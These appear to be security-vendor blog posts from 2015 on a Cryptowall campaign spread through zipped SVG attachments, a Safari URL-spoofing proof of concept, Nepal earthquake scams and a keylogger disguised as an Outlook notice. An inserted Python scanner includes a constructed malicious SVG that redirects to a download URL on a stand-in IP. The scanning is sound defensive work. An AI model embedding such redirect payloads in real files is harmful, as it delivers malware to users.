End of life (EOL) is approaching. July 14, 2015 is an important date to note if your organization is still running Microsoft Windows Server 2003. After this date, extended support will end and Microsoft will no longer deliver critical security patches or updates. Described by some as one of the “biggest security risks of 2015,” there are major threats to your organization if migration is forgone or delayed past this deadline. This official alert from the US Department of Homeland Security warns of the possible consequences facing those who do not take action, including cybersecurity threats as well as compliance and compatibility issues.

Plan ahead! Doing a migration after a server has failed will not only increase server maintenance costs, but will also put your data at risk and result in lost productivity. By moving to the cloud, you can reduce your costs and grow your business. AppRiver has solutions for you in both our Secure Hosted Exchange and Office 365 services. There are a few initial steps that our team can help you complete, and depending on which platform you’re coming from, we can easily migrate your email messages, folders, calendars, contacts and notes. We understand that migrating your email and services can be a stressful transition, but our 24/7 Phenomenal Care™ team will be with you every step of the way, eliminating the guesswork and helping you transition with confidence.

This morning we saw a malware campaign with zipped SVG files attached to the messages. SVG files are normally used for images and support some interactive features, for example a graph on a web page that shows extra information when you hover over an option. These SVG files, however, contained a small JavaScript entry that would open a web page to download malware.
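To show what a mail filter can check for on this kind of attachment, here is an added Python example (not AppRiver's code) that unpacks a zipped attachment in memory and flags SVG members that carry script elements, event-handler attributes or external links; it also flags members with executable-style extensions such as the .ace/.scr pair described further down this page. The zip, the SVG contents and the 203.0.113.10 address are constructed samples.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Extensions that should never arrive unsolicited inside a mail attachment.
RISKY_EXTENSIONS = {".scr", ".exe", ".ace", ".js", ".vbs"}

def svg_findings(svg_bytes: bytes) -> list[str]:
    """Return the reasons an SVG looks 'active' rather than a plain image."""
    findings = []
    for elem in ET.fromstring(svg_bytes).iter():
        tag = elem.tag.split("}")[-1].lower()        # strip the XML namespace
        if tag == "script":
            findings.append("embedded <script> element")
        for attr, value in elem.attrib.items():
            name = attr.split("}")[-1].lower()       # e.g. xlink:href -> href
            if name.startswith("on"):                # onload=, onclick=, ...
                findings.append(f"event handler {name}=")
            if name == "href" and re.match(r"(?i)\s*(javascript:|https?://)", value):
                findings.append(f"external or script href on <{tag}>")
    return findings

def scan_zip_attachment(zip_bytes: bytes) -> dict[str, list[str]]:
    """Map each zip member to its findings; an empty list means nothing suspicious."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext in RISKY_EXTENSIONS:
                report[name] = [f"risky extension {ext}"]
            elif ext == ".svg":
                report[name] = svg_findings(zf.read(name))
            else:
                report[name] = []
    return report

# Constructed samples: an SVG whose only job is to open a download URL, a clean one,
# and a placeholder .scr (not a real executable).
MALICIOUS_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="window.open(\'http://203.0.113.10/dl\')">'
                 b"<script>window.location='http://203.0.113.10/dl';</script></svg>")
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'

def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.svg", MALICIOUS_SVG)
        zf.writestr("logo.svg", CLEAN_SVG)
        zf.writestr("updatemail.scr", b"MZ")
    return buf.getvalue()

if __name__ == "__main__":
    for member, reasons in scan_zip_attachment(build_sample_zip()).items():
        print(member, "->", reasons or "clean")
```
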

[Screenshots: 2015-05-20 10:44:31 and 2015-05-20 09:45:21]

The IP link in question ends up forwarding to another domain where a zip containing the actual exe payload is downloaded. It didn’t auto-execute; user interaction would still be needed for that. The payload this time around is Cryptowall. When the file executes it creates HELP_DECRYPT.TXT, HELP_DECRYPT.PNG, HELP_DECRYPT.HTML and HELP_DECRYPT.URL files, all of which have been associated with Cryptowall infections. Searching any of those file names online brings up many write-ups on the virus family. It also created a public RSA key and entered it into the registry (the key used to encrypt the files). After just a few minutes, the Cryptowall 3.0 popup with steps to pay did indeed appear. Crypto ransomware has proven many times to be effective for attackers at getting users to actually pay the ransom. The tactic is still alive and likely to continue evolving. With these attacks still prevalent, it’s a good idea to make sure you are covered with data backups that the malware cannot reach (it has been known to encrypt network shares and NAS units).

[Image: HELP_DECRYPT ransom note]

The original notification pop up on the PC

[Screenshot: 2015-05-21 13:56:36]

The website on Tor showing how to pay the $700 to decrypt files.


The interesting bit of info I noticed while looking at the downloaded exe was that it had SQL commands hard-coded in it. Looking closer, they all seemed related to a school’s SQL database. Some of the recipients we stopped this malware for were schools, but nothing seemed out of the ordinary with the volume of recipients, which was low in general. It’s possible the malware had intentions beyond encrypting, such as wreaking havoc in a SQL database; this came from a strings output, so it was all plain text, and the table naming conventions seem a little too plain as well. Still, someone knowing the SQL table names, or a school using a plain naming convention, could be problematic if the malware were to attempt to gain access and do its thing. It’s also a known tactic for malware authors to add code that isn’t used, or code that pads out functions, to distract from analysis and make it more complex and time-consuming. So that’s a possibility. While these appeared to be part of valid functions, it looks like they were not used during testing, though it’s possible very specific conditions needed to be met for this to go active and attempt SQL changes.

[Screenshot: 2015-05-20 10:09:43, SQL strings from the exe]

There was also some ASCII art in the strings output. I had originally posted this upside down, but after flipping it, it appears to be an animal holding a heart.

[Screenshot: 2015-05-20 15:24:04, ASCII art from the strings output]


Safari

Researcher David Leo of Deusen.co.uk has announced a proof-of-concept vulnerability, active until recently in both the Chrome and Safari browsers, that allows attackers to spoof legitimate URLs in the address bar while taking web surfers to a completely different site. Chrome has since patched this vulnerability, but Safari has not. This leaves all devices that rely on the Safari browser vulnerable to this exploit, including current Macs running OS X, iPhones and iPads.

This exploit works by running a quick and tiny code snippet in the browser when a supposedly legitimate link is presented to end users. The actual “legitimate link” is requested and the browser begins to head in that direction, but before it arrives, the exploit redirects the browser to the false destination. The original URL remains in the address bar, making it appear as though the user has ended up at the legitimate site. The code is very simple and very lightweight, making it potentially enticing to those who would like to mount a very convincing phishing attack. Through spoofing, attackers already use legitimate sites and news stories to make their attacks more convincing, usually by stealing graphics and headlines. A couple of safety precautions, or things to look out for in these attacks, would be to mouse over the link provided to make sure it points where it says it does. Ending up at a destination that was not advertised is another bright red flag. However, in this style of attack, everything would simply appear normal and correct on the surface.

This is a look at the code that executes this exploit:

[Screenshot: the PoC code]

This particular PoC makes the user believe they are headed to the news site dailymail.co.uk; however, the hidden redirect takes viewers back to the research page on deusen.co.uk while keeping dailymail.co.uk in the address bar.

To test this exploit on your system, David Leo has provided a test page to see if you are a potential victim, located here: http://www.deusen.co.uk/items/iwhere.9500182225526788/ Simply press “Go” and if Dailymail shows in your address bar, you are still vulnerable to this attack and are encouraged to be extra careful while browsing the internet or following links within emails from unexpected sources.

[Screenshot: the test page]

As most people know by now, a large earthquake struck Nepal a few days ago, causing massive amounts of damage and deaths in the thousands. After most large tragic events like this, scammers unfortunately come out of the dark corners of the internet to take advantage of the public’s kindness in wanting to help. We’ve seen it many times, and unfortunately the Nepal earthquake is no different.

We’ve been seeing a slow influx of messages mentioning the earthquake as an attention getter for ordinary spam. Things like diabetes medicine spam will have a quick news sentence at the top about the earthquake to get a user’s attention and then go on to try to sell whatever the original goal was. We’ve also seen customized 419 scam messages coming in claiming to be from victims of the earthquake. The theme is similar to normal 419s, where they want you to help them with their large amounts of money, but specifically focused around recent events with the earthquake.

[Screenshot: 2015-04-29 08:53:32]

There have also been some emails claiming to be part of relief funds that are just phishing for responses. Responding to messages like this opens up a can of worms, allowing the attacker to focus on the user and try to convince them to send money somewhere. In the case of a large disaster, they may use guilt to pressure a user into sending money, which can be a very effective method.

[Screenshot: 2015-04-29 08:48:51]

There was a small virus campaign as well. It looks like the exe was having some issues, though, since it seemed to keep crashing shortly after starting. However, I did see some keyboard hooking, so it was most likely a small keylogger that would record keystrokes and send them off to a remote server.

[Screenshot: 2015-04-29 08:56:27]


It’s always unfortunate to see spam and virus campaigns focus on taking advantage of people’s goodwill in wanting to help. We always see these types of things after newsworthy world events, and we will probably continue to see them. This doesn’t mean users should ignore every email asking for support or help, since there will be legitimate companies and organizations seeking support. But users should be mindful of emails pertaining to recent events, since that can be a major focus of campaigns over the coming weeks. Researching charities, dealing with known companies through their public websites, and avoiding unknown or unexpected attachments are good steps to make sure you aren’t getting scammed or running viruses.

Yesterday we began seeing a malware campaign posing as a message from “Microsoft Outlook”. The messages pose as a notification to the user that they have exceeded their mailbox storage limit and advise the user to open the attachment to upgrade their account. The attachment in these messages is an ACE (.ace) archive that contains a malicious SCR (.scr) file. ACE is a data compression file format similar to the more commonly used ZIP or RAR, and though it is not as common as ZIP or RAR, unpacking ACE files is supported by many third-party archivers, so it should not pose a problem for most users. The file inside is a rather large (643kb) SCR file named updatemail(dot)ace.

[Screenshot: the fake Outlook notification]

While the majority of malware hitting our filters each day contains a smaller Trojan ‘dropper’ file that pulls down additional malicious software from the internet, this particular piece contains all needed functionality in the original attached file. In other words, it has no need to pull down more malicious software from the internet to do its damage. Once executed, the malware drops a file in AppData and then adds itself to a Run registry key to ensure that it keeps running on the system in the future. It also immediately registers a hook to monitor keyboard input (keylogging) and sets up a listener on TCP port 49202. We also observed the malware attempting to harvest bitcoin that might be stored on the user’s system, and a self-propagation capability via SMTP, so we can likely expect to see more of these in the future.

File Name: Updatemail(dot)ace
MD5: 7e46f98e98eb39d13ddfaa66551181b7
SHA1: 6baeced8fdf6c93a024167fb961e5037b59e5006
SHA256: eb97f6d0a454e0034e06d16e69ab6dddbf9d3d8e790e66003d6b3cfebd9d29e7